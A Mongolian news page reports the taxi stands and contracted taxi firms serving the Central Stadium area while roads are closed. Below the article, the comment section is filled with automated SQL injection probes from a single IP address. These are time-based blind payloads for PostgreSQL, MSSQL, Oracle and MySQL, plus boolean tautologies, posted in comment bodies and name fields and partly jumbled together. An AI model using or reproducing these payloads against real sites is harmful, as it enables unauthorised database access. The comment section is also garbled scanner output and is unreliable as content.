Гэрээт байгууллагын такси зам хаасан чиглэлд ч зорчино

Aдмин / Нүүр

Төв цэнгэлдэх хүрээлэн орчим болон Таван шарын дөрвөн түр зогсоолоос Нийслэлийн Нийтийн тээврийн газартай гэрээтэй ажилладаг найман аж ахуйн нэгжийн 383 такси иргэдэд үйлчилнэ. Албан ёсны гэрээт байгууллагын таксинууд зам хаасан чиглэлд үйлчлэх бөгөөд эрх авсан 180 такси байгаа аж.

Такси үйлчилгээний зогсоолууд:

1. Төв цэнгэлдэх хүрээлэнгийн урд тал: Нийслэлийн гудамж, “Хурд” хорооллын хойд зогсоол;

2. Төв цэнгэлдэх хүрээлэнгийн хойд тал: Махатма Гандийн гудамж, “Ж” зогсоолын баруун талын зогсоол,

3. Төв цэнгэлдэх хүрээлэнгийн баруун тал: Чингисийн өргөн чөлөө, Наадам центрийн баруун талын зогсоол,

4. Таван шарын хойд автобусны зогсоолын зүүн талаас албан ёсны гэрээ бүхий компанийн таксинууд үйлчилгээ үзүүлэх юм байна.


Сэтгэгдэл

Зочин [196.196.203.214] 2022-07-10 23:38:56

Зочин [196.196.203.214] 2022-07-10 23:38:40

Зочин [196.196.203.214] 2022-07-10 23:38:26

@@trMJK

Зочин [196.196.203.214] 2022-07-10 23:38:25

1

Зочин [196.196.203.214] 2022-07-10 23:38:25

1'"

Зочин [196.196.203.214] 2022-07-10 23:38:25

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 23:38:08

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 23:37:52

6BZlgNQh')) OR 299=(SELECT 299 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:37:36

PraaOGyw') OR 753=(SELECT 753 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:37:22

habHmV7U' OR 724=(SELECT 724 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:37:06

-1)) OR 731=(SELECT 731 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:36:52

-5) OR 168=(SELECT 168 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:36:38

-5 OR 670=(SELECT 670 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:36:25

h00KzRWL'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:36:12

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:35:59

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:35:46

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:35:33

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 23:35:21

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-10 23:35:08

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-10 23:34:56

if(now()=sysdate(),sleep(15),0)

Зочин [196.196.203.214] 2022-07-10 23:34:44

-1" OR 2+918-918-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:34:43

-1' OR 2+327-327-1=0+0+0+1 or 'vLKBnUVp'='

Зочин [196.196.203.214] 2022-07-10 23:34:43

-1' OR 2+349-349-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:34:42

-1 OR 2+212-212-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 23:34:42

-1 OR 2+919-919-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:34:41

yYGyHWJR

Зочин [196.196.203.214] 2022-07-10 23:34:29

1

Зочин [196.196.203.214] 2022-07-10 23:34:17

1

@@ukXyF [196.196.203.214] 2022-07-10 23:34:03

1 [196.196.203.214] 2022-07-10 23:34:03

1'" [196.196.203.214] 2022-07-10 23:34:02

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:34:02

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 23:33:48

y5EqGMJl')) OR 861=(SELECT 861 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:33:35

k3R5hvQJ') OR 598=(SELECT 598 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:33:22

fZiIoB9s' OR 38=(SELECT 38 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:33:10

-1)) OR 662=(SELECT 662 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:32:58

-5) OR 61=(SELECT 61 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:32:45

-5 OR 142=(SELECT 142 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:32:33

AO0rmXPP'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:32:21

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:32:10

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:31:57

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:31:45

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:31:32

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:31:20

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:31:07

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:30:56

-1" OR 2+210-210-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:30:43

-1' OR 2+766-766-1=0+0+0+1 or 'ojI81APv'=' [196.196.203.214] 2022-07-10 23:30:43

-1' OR 2+82-82-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:30:42

-1 OR 2+115-115-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:30:42

-1 OR 2+572-572-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:30:42

4OI2NNx6 [196.196.203.214] 2022-07-10 23:30:41

1 [196.196.203.214] 2022-07-10 23:30:28

1 [196.196.203.214] 2022-07-10 23:30:16

Зочин [196.196.203.214] 2022-07-10 23:27:42

aiPxvpay [196.196.203.214] 2022-07-10 23:27:32

1

Зочин [196.196.203.214] 2022-07-10 23:27:30

Зочин [196.196.203.214] 2022-07-10 23:27:26

1

aiPxvpay [196.196.203.214] 2022-07-10 23:27:20

1

Зочин [196.196.203.214] 2022-07-10 23:27:13

1

Зочин [@@kvwfJ] 2022-07-10 22:56:43

Зочин [1] 2022-07-10 22:56:43

Зочин [1'"] 2022-07-10 22:56:43

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 22:56:42

Зочин [gfzpbbM7')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--] 2022-07-10 22:56:29

Зочин [yoJ8Nkap') OR 219=(SELECT 219 FROM PG_SLEEP(15))--] 2022-07-10 22:56:16

Зочин [dPiHxWX8' OR 12=(SELECT 12 FROM PG_SLEEP(15))--] 2022-07-10 22:56:03

Зочин [Jw3wbMXm'; waitfor delay '0:0:15' -- ] 2022-07-10 22:55:50

aiPxvpay [@@sP9QL] 2022-07-10 22:55:45

1

aiPxvpay [1] 2022-07-10 22:55:44

1

aiPxvpay [1'"] 2022-07-10 22:55:44

1

aiPxvpay [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 22:55:43

1

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 22:55:38

aiPxvpay [blEOSRsL')) OR 466=(SELECT 466 FROM PG_SLEEP(15))--] 2022-07-10 22:55:31

1

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 22:55:25

aiPxvpay [ZF5Bcx9S') OR 845=(SELECT 845 FROM PG_SLEEP(15))--] 2022-07-10 22:55:18

1

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 22:55:12

aiPxvpay [gGdxieoO' OR 23=(SELECT 23 FROM PG_SLEEP(15))--] 2022-07-10 22:55:03

1

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 22:54:58

aiPxvpay [3bkVIKAF'; waitfor delay '0:0:15' -- ] 2022-07-10 22:54:51

1

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 22:54:46

aiPxvpay [1 waitfor delay '0:0:15' -- ] 2022-07-10 22:54:39

1

Зочин [-1" OR 2+696-696-1=0+0+0+1 -- ] 2022-07-10 22:54:34

Зочин [-1' OR 2+386-386-1=0+0+0+1 or 'Ofgx0OfX'='] 2022-07-10 22:54:33

Зочин [-1' OR 2+989-989-1=0+0+0+1 -- ] 2022-07-10 22:54:33

Зочин [-1 OR 2+556-556-1=0+0+0+1] 2022-07-10 22:54:32

Зочин [-1 OR 2+552-552-1=0+0+0+1 -- ] 2022-07-10 22:54:32

Зочин [85fWhHu6] 2022-07-10 22:54:31

aiPxvpay [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 22:54:27

1

Зочин [196.196.203.214] 2022-07-10 22:54:18

aiPxvpay [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 22:54:14

1

Зочин [196.196.203.214] 2022-07-10 22:54:06

aiPxvpay [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 22:54:00

1

Зочин [196.196.203.214] 2022-07-10 22:53:51

aiPxvpay [if(now()=sysdate(),sleep(15),0)] 2022-07-10 22:53:47

1

Зочин [196.196.203.214] 2022-07-10 22:53:37

aiPxvpay [-1" OR 2+782-782-1=0+0+0+1 -- ] 2022-07-10 22:53:35

1

aiPxvpay [-1' OR 2+796-796-1=0+0+0+1 or 'icjDAvJr'='] 2022-07-10 22:53:34

1

aiPxvpay [-1' OR 2+36-36-1=0+0+0+1 -- ] 2022-07-10 22:53:34

1

aiPxvpay [-1 OR 2+453-453-1=0+0+0+1] 2022-07-10 22:53:33

1

aiPxvpay [-1 OR 2+326-326-1=0+0+0+1 -- ] 2022-07-10 22:53:33

1

aiPxvpay [6W13EWAU] 2022-07-10 22:53:33

1

aiPxvpay [196.196.203.214] 2022-07-10 22:53:19

1

aiPxvpay [196.196.203.214] 2022-07-10 22:53:07

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:40

1

Зочин [196.196.203.214] 2022-07-10 22:49:59

Зочин [196.196.203.214] 2022-07-10 22:49:44

Зочин [196.196.203.214] 2022-07-10 22:49:30

@@2MTob

Зочин [196.196.203.214] 2022-07-10 22:49:29

1

Зочин [196.196.203.214] 2022-07-10 22:49:29

1'"

Зочин [196.196.203.214] 2022-07-10 22:49:28

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 22:49:16

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 22:49:03

4uWg5Zt2')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:48:50

pTmS8bNG') OR 549=(SELECT 549 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:48:47

1

Зочин [196.196.203.214] 2022-07-10 22:48:36

uX1aAct9' OR 244=(SELECT 244 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:48:33

1

Зочин [196.196.203.214] 2022-07-10 22:48:22

-1)) OR 340=(SELECT 340 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:48:19

@@qVxsm

aiPxvpay [196.196.203.214] 2022-07-10 22:48:19

1

aiPxvpay [196.196.203.214] 2022-07-10 22:48:18

1'"

aiPxvpay [196.196.203.214] 2022-07-10 22:48:18

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 22:48:07

-5) OR 464=(SELECT 464 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:48:03

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 22:47:53

-5 OR 501=(SELECT 501 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:47:48

VKDiZivX')) OR 10=(SELECT 10 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:47:38

miPoPcng'; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:47:33

VaDr8ABi') OR 515=(SELECT 515 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:47:24

1 waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:47:20

e5PlnNhl' OR 99=(SELECT 99 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:47:10

-1); waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:47:05

-1)) OR 83=(SELECT 83 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:46:56

-1; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:46:51

-5) OR 591=(SELECT 591 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:46:39

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 22:46:35

-5 OR 381=(SELECT 381 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:46:25

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 22:46:20

5Y2tQqtL'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:46:10

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 22:46:06

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:45:56

if(now()=sysdate(),sleep(15),0)

aiPxvpay [196.196.203.214] 2022-07-10 22:45:51

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:45:42

-1" OR 2+944-944-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:45:42

-1' OR 2+754-754-1=0+0+0+1 or 'ibIYlaBx'='

Зочин [196.196.203.214] 2022-07-10 22:45:41

-1' OR 2+241-241-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:45:41

-1 OR 2+81-81-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 22:45:40

-1 OR 2+902-902-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:45:40

8a3hMeQA

aiPxvpay [196.196.203.214] 2022-07-10 22:45:37

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:45:25

1

aiPxvpay [196.196.203.214] 2022-07-10 22:45:22

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 22:45:10

1

aiPxvpay [196.196.203.214] 2022-07-10 22:45:07

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

@@vOqiB [196.196.203.214] 2022-07-10 22:44:57

1 [196.196.203.214] 2022-07-10 22:44:57

1'" [196.196.203.214] 2022-07-10 22:44:56

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:44:56

aiPxvpay [196.196.203.214] 2022-07-10 22:44:53

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 22:44:42

aiPxvpay [196.196.203.214] 2022-07-10 22:44:39

if(now()=sysdate(),sleep(15),0)

SgcgCAOJ')) OR 820=(SELECT 820 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:44:27

aiPxvpay [196.196.203.214] 2022-07-10 22:44:24

-1" OR 2+574-574-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:44:24

-1' OR 2+338-338-1=0+0+0+1 or '99KodOKw'='

aiPxvpay [196.196.203.214] 2022-07-10 22:44:23

-1' OR 2+813-813-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:44:23

-1 OR 2+610-610-1=0+0+0+1

aiPxvpay [196.196.203.214] 2022-07-10 22:44:22

-1 OR 2+195-195-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:44:22

XAryE2Z1

XuLHq1X3') OR 683=(SELECT 683 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:44:12

aiPxvpay [196.196.203.214] 2022-07-10 22:44:08

1

C10kA8Es' OR 706=(SELECT 706 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:57

aiPxvpay [196.196.203.214] 2022-07-10 22:43:53

1

-1)) OR 676=(SELECT 676 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:43

@@ApGU7 [196.196.203.214] 2022-07-10 22:43:38

1

1 [196.196.203.214] 2022-07-10 22:43:38

1

1'" [196.196.203.214] 2022-07-10 22:43:37

1

aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:43:37

1

-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:28

eJ7QwtCa')) OR 86=(SELECT 86 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:22

1

-5 OR 147=(SELECT 147 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:14

T8otuukm') OR 250=(SELECT 250 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:43:08

1

sTOmy7i0'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:43:00

V0hLSzMO' OR 745=(SELECT 745 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:42:54

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:42:45

BOCbX3rf'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:42:39

1

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:42:30

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:42:24

1

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:42:15

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:42:08

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:42:01

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:41:54

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:41:46

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:41:40

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:41:32

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:41:26

1

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:41:18

-1" OR 2+675-675-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:11

1

-1' OR 2+554-554-1=0+0+0+1 or 'plsMniJU'=' [196.196.203.214] 2022-07-10 22:41:11

1

-1' OR 2+771-771-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:10

1

-1 OR 2+213-213-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:41:10

1

-1 OR 2+480-480-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:10

1

kV4zOA12 [196.196.203.214] 2022-07-10 22:41:09

1

-1" OR 2+216-216-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:04

-1' OR 2+957-957-1=0+0+0+1 or 'BvNr5pac'=' [196.196.203.214] 2022-07-10 22:41:04

-1' OR 2+120-120-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:03

-1 OR 2+728-728-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:41:03

-1 OR 2+82-82-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:41:02

5hUipBPQ [196.196.203.214] 2022-07-10 22:41:02

aiPxvpay [196.196.203.214] 2022-07-10 22:40:54

1

1 [196.196.203.214] 2022-07-10 22:40:48

aiPxvpay [196.196.203.214] 2022-07-10 22:40:40

1

1 [196.196.203.214] 2022-07-10 22:40:34

aiPxvpay [196.196.203.214] 2022-07-10 22:37:41

1

Зочин [196.196.203.214] 2022-07-10 22:37:32

aiPxvpay [196.196.203.214] 2022-07-10 22:37:28

1

Зочин [196.196.203.214] 2022-07-10 22:37:18

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:43

1

Зочин [196.196.203.214] 2022-07-10 22:34:38

Зочин [196.196.203.214] 2022-07-10 22:34:38

Зочин [196.196.203.214] 2022-07-10 22:34:38

Зочин [196.196.203.214] 2022-07-10 22:34:35

1

Зочин [196.196.203.214] 2022-07-10 22:34:35

1

Зочин [196.196.203.214] 2022-07-10 22:34:35

1

Зочин [196.196.203.214] 2022-07-10 22:34:35

1

aiPxvpay [196.196.203.214] 2022-07-10 22:33:17

1

aiPxvpay [196.196.203.214] 2022-07-10 22:33:17

1

aiPxvpay [196.196.203.214] 2022-07-10 22:33:13

1

aiPxvpay [196.196.203.214] 2022-07-10 22:33:13

1

aiPxvpay [196.196.203.214] 2022-07-10 22:33:13

1

Зочин [196.196.203.214] 2022-07-10 22:33:09

Зочин [196.196.203.214] 2022-07-10 22:33:09


238 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
238 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.